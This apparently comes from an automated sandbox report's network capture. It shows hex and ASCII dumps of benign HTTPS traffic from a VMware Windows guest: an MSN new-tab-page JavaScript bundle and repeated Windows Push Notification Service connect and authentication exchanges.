                                                                                                                                                                                                                                                                                                                            Host: assets.msn.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC1238INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                            Content-MD5: mnSxx044ngd8b1v/JLTBCA==
                                                                                                                                                                                                                                                                                                                            Last-Modified: Fri, 03 Jan 2025 21:01:15 GMT
                                                                                                                                                                                                                                                                                                                            ETag: 0x8DD2C39C2E90AC3
                                                                                                                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                            x-ms-request-id: 59695666-801e-0055-2c22-5eabf6000000
                                                                                                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:26 GMT
                                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                            Akamai-Request-BC: [a=23.210.4.171,b=2172968801,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                                            Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                                            Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                                            Akamai-Server-IP: 23.210.4.171
                                                                                                                                                                                                                                                                                                                            Akamai-Request-ID: 8184df61
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Akamai-GRN: 0.ab04d217.1736062766.8184df61
                                                                                                                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC15146INData Raw: 30 30 30 30 36 30 30 30 0d 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 6d 6d 6f 6e 22 5d 2c 7b 38 35 32 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 24 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 24 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 2c 42 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 42 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 48 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00006000(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["common"],{85289:function(e,t,n){"use strict";n.d(t,{$6:function(){return C},$W:function(){return A},BA:function(){return l},Bd:function(){return i},H1:function(){return
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC9442INData Raw: 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 5b 74 68 69 73 2e 69 6d 61 67 65 49 64 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 74 74 72 69 62 75 74 69 6f 6e 2c 69 73 44 69 73 70 6c 61 79 65 64 3a 21 30 2c 74 69 74 6c 65 3a 6e 75 6c 6c 2c 74 69 74 6c 65 55 52 4c 3a 6e 75 6c 6c 7d 29 7d 67 65 74 4c 6f 63 54 69 74 6c 65 4b 65 79 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6d 61 67 65 49 64 3c 3d 74 68 69 73 2e 63 6d 73 53 69 7a 65 3f 60 69 6d 61 67 65 24 7b 74 68 69 73 2e 69 6d 61 67 65 49 64 7d 60 3a 60 73 69 6d 70 6c 65 24 7b 74 68 69 73 2e 69 6d 61 67 65 49 64 7d 60 7d 73 65 74 49 6d 61 67 65 41 6e 64 4d 75 73 65 75 6d 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 28 29 7b 76 61 72 20 65 2c
                                                                                                                                                                                                                                                                                                                            Data Ascii: )||void 0===t||null===(t=t[this.imageId])||void 0===t?void 0:t.attribution,isDisplayed:!0,title:null,titleURL:null})}getLocTitleKey(){return this.imageId<=this.cmsSize?`image${this.imageId}`:`simple${this.imageId}`}setImageAndMuseumCardProperties(){var e,
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 68 61 76 69 6f 72 3a 54 2e 77 75 2e 46 6f 6c 6c 6f 77 2c 63 6f 6e 74 65 6e 74 3a 7b 68 65 61 64 6c 69 6e 65 3a 22 54 75 72 6e 20 4f 6e 20 48 6f 6c 69 64 61 79 20 53 77 69 74 63 68 20 42 61 63 6b 67 72 6f 75 6e 64 22 7d 7d 29 2e 67 65 74 4d 65 74 61 64 61 74 61 54 61 67 28 29 2c 74 68 69 73 2e 74 75 72 6e 4f 66 66 48 6f 6c 69 64 61 79 53 77 69 74 63 68 42 75 74 74 6f 6e 54 65 6c 65 6d 65 74 72 79 54 61 67 3d 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 4f 62 6a 65 63 74 2e 61 64 64 4f 72 55 70 64 61 74 65 43 68 69 6c 64 28 7b 6e 61 6d 65 3a 22 48 6f 6c 69 64 61 79 53 77 69 74 63 68 42 75 74 74 6f 6e 3e 54 75 72 6e 4f 66 66 22 2c 74 79 70 65 3a 54 2e 63 39 2e 49 6e 74 65 72 61 63 74 69 6f 6e 2c 62 65 68 61 76 69 6f 72 3a 54 2e 77
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00006000havior:T.wu.Follow,content:{headline:"Turn On Holiday Switch Background"}}).getMetadataTag(),this.turnOffHolidaySwitchButtonTelemetryTag=this.telemetryObject.addOrUpdateChild({name:"HolidaySwitchButton>TurnOff",type:T.c9.Interaction,behavior:T.w
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC8204INData Raw: 79 42 61 63 6b 67 72 6f 75 6e 64 26 26 74 68 69 73 2e 63 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 45 76 65 6e 74 47 6c 65 61 6d 49 6d 61 67 65 26 26 74 68 69 73 2e 65 76 65 6e 74 47 6c 65 61 6d 29 74 68 69 73 2e 69 6d 61 67 65 50 72 6f 76 69 64 65 72 2e 61 73 73 69 67 6e 48 6f 6c 69 64 61 79 42 61 63 6b 67 72 6f 75 6e 64 28 29 2c 6b 2e 4d 30 2e 61 64 64 4f 72 55 70 64 61 74 65 54 6d 70 6c 50 72 6f 70 65 72 74 79 28 22 65 76 74 42 6b 67 22 2c 22 31 22 29 3b 65 6c 73 65 20 69 66 28 28 30 2c 4e 2e 4e 29 28 29 29 74 68 69 73 2e 63 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 4e 65 77 48 6f 6c 69 64 61 79 73 49 6d 61 67 65 73 26 26 74 68 69 73 2e 64 61 69 6c 79 52 6f 74 61 74 69 6f 6e 45 6e 61 62 6c 65 64 28 29 3f 74 68 69 73 2e 69 6d 61 67 65 50 72 6f 76 69 64 65 72 26 26
                                                                                                                                                                                                                                                                                                                            Data Ascii: yBackground&&this.config.enableEventGleamImage&&this.eventGleam)this.imageProvider.assignHolidayBackground(),k.M0.addOrUpdateTmplProperty("evtBkg","1");else if((0,N.N)())this.config.enableNewHolidaysImages&&this.dailyRotationEnabled()?this.imageProvider&&
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 67 65 22 3d 3d 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 26 26 74 68 69 73 2e 75 70 64 61 74 65 50 72 6f 70 65 72 74 69 65 73 28 29 7d 2c 74 68 69 73 2e 6f 6e 47 61 6c 6c 65 72 79 41 70 70 6c 69 65 64 3d 28 29 3d 3e 7b 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 53 6f 75 72 63 65 43 68 61 6e 67 65 64 3d 21 30 2c 74 68 69 73 2e 64 65 66 69 6e 65 43 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 28 29 7d 2c 74 68 69 73 2e 73 74 61 74 65 73 53 79 6e 63 49 6e 69 74 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 5b 22 62 61 63 6b 67 72 6f 75 6e 64 47 61 6c 6c 65 72 79 42 75 74 74 6f 6e 45 6e 61 62 6c 65 64 22 2c 22 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 22 2c 22 6d 75 73 65 75 6d 43 72 65 64 69 74 73 43
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000ge"===this.currentProvider&&this.updateProperties()},this.onGalleryApplied=()=>{this.backgroundSourceChanged=!0,this.defineCurrentProvider()},this.statesSyncInit=()=>{const e=[];["backgroundGalleryButtonEnabled","currentProvider","museumCreditsC
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 65 74 50 72 65 66 65 72 65 6e 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: etPreferen
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 63 65 42 79 4b 65 79 46 72 6f 6d 46 72 6f 6d 50 72 65 66 65 72 65 6e 63 65 73 43 61 63 68 65 28 44 2e 77 49 2e 62 61 63 6b 67 72 6f 75 6e 64 53 65 6c 65 63 74 69 6f 6e 4d 65 74 61 64 61 74 61 29 3b 69 26 26 69 2e 63 6f 6e 66 69 67 49 6e 64 65 78 26 26 28 74 3d 22 43 4d 53 49 6d 61 67 65 22 3d 3d 3d 69 2e 70 72 6f 76 69 64 65 72 7c 7c 22 56 69 64 65 6f 22 3d 3d 3d 69 2e 70 72 6f 76 69 64 65 72 29 2c 6e 26 26 21 74 26 26 28 74 68 69 73 2e 73 73 72 42 61 63 6b 67 72 6f 75 6e 64 4d 65 74 61 64 61 74 61 3d 7b 2e 2e 2e 74 68 69 73 2e 73 73 72 42 61 63 6b 67 72 6f 75 6e 64 4d 65 74 61 64 61 74 61 2c 64 61 72 6b 3a 74 68 69 73 2e 65 76 65 6e 74 47 6c 65 61 6d 2e 44 61 72 6b 47 6c 65 61 6d 55 72 6c 2c 6c 69 67 68 74 3a 74 68 69 73 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000ceByKeyFromFromPreferencesCache(D.wI.backgroundSelectionMetadata);i&&i.configIndex&&(t="CMSImage"===i.provider||"Video"===i.provider),n&&!t&&(this.ssrBackgroundMetadata={...this.ssrBackgroundMetadata,dark:this.eventGleam.DarkGleamUrl,light:this.
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 6f 6e 74 61 69 6e 65 72 7b 70 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: ontainer{p
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 7d 2e 6d 61 72 71 75 65 65 41 64 44 69 73 6d 69 73 73 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 7b 6c 65 66 74 3a 69 6e 69 74 69 61 6c 3b 72 69 67 68 74 3a 31 32 70 78 7d 2e 63 6f 70 79 72 69 67 68 74 43 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 7d 2e 6d 75 73 65 75 6d 43 61 72 64 7b 6c 65 66 74 3a 69 6e 69 74 69 61 6c 3b 72 69 67 68 74 3a 31 32 70 78 7d 2e 73 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 7d 60 2c 58 65 3d 47 65 2e 69 60 20 2e 62 61 63 6b 67 72 6f 75 6e 64 42 75 74 74 6f 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000adding-left:12px}.marqueeAdDismissButtonContainer{left:initial;right:12px}.copyrightContainer{padding-left:12px}.museumCard{left:initial;right:12px}.secondaryButton{float:right;margin-right:8px}`,Xe=Ge.i` .backgroundButton{float:left}.background
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 68 69 73 2e 69 73 44 65 66 61 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: his.isDefa


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            11192.168.2.65001140.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 49 45 76 65 39 45 65 6b 6b 2b 45 48 74 67 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 38 33 31 39 36 35 65 61 31 66 32 39 30 31 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: 5IEve9Eekk+EHtgQ.1Context: 4831965ea1f29014
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 49 45 76 65 39 45 65 6b 6b 2b 45 48 74 67 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 38 33 31 39 36 35 65 61 31 66 32 39 30 31 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5IEve9Eekk+EHtgQ.2Context: 4831965ea1f29014<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 49 45 76 65 39 45 65 6b 6b 2b 45 48 74 67 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 38 33 31 39 36 35 65 61 31 66 32 39 30 31 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 5IEve9Eekk+EHtgQ.3Context: 4831965ea1f29014<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:45 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:45 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 53 69 52 4b 69 4c 45 4d 6b 4b 6b 54 79 57 45 4f 31 2f 45 63 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: ZSiRKiLEMkKkTyWEO1/EcQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            12192.168.2.65006940.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 71 46 62 41 73 69 44 70 64 30 75 45 38 6c 34 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 32 33 33 31 64 62 33 31 37 61 33 31 61 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: qFbAsiDpd0uE8l4o.1Context: 9642331db317a31a
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 71 46 62 41 73 69 44 70 64 30 75 45 38 6c 34 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 32 33 33 31 64 62 33 31 37 61 33 31 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: qFbAsiDpd0uE8l4o.2Context: 9642331db317a31a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 71 46 62 41 73 69 44 70 64 30 75 45 38 6c 34 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 32 33 33 31 64 62 33 31 37 61 33 31 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: qFbAsiDpd0uE8l4o.3Context: 9642331db317a31a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 53 71 50 46 74 2b 41 42 54 55 4b 78 51 43 49 7a 70 2f 4a 4e 65 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: SqPFt+ABTUKxQCIzp/JNeg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            13192.168.2.65007040.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:35 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 55 37 42 68 30 6e 45 47 55 32 37 76 36 6f 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 39 61 37 34 61 30 62 35 39 34 63 63 64 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: EU7Bh0nEGU27v6oh.1Context: 6c9a74a0b594ccd8
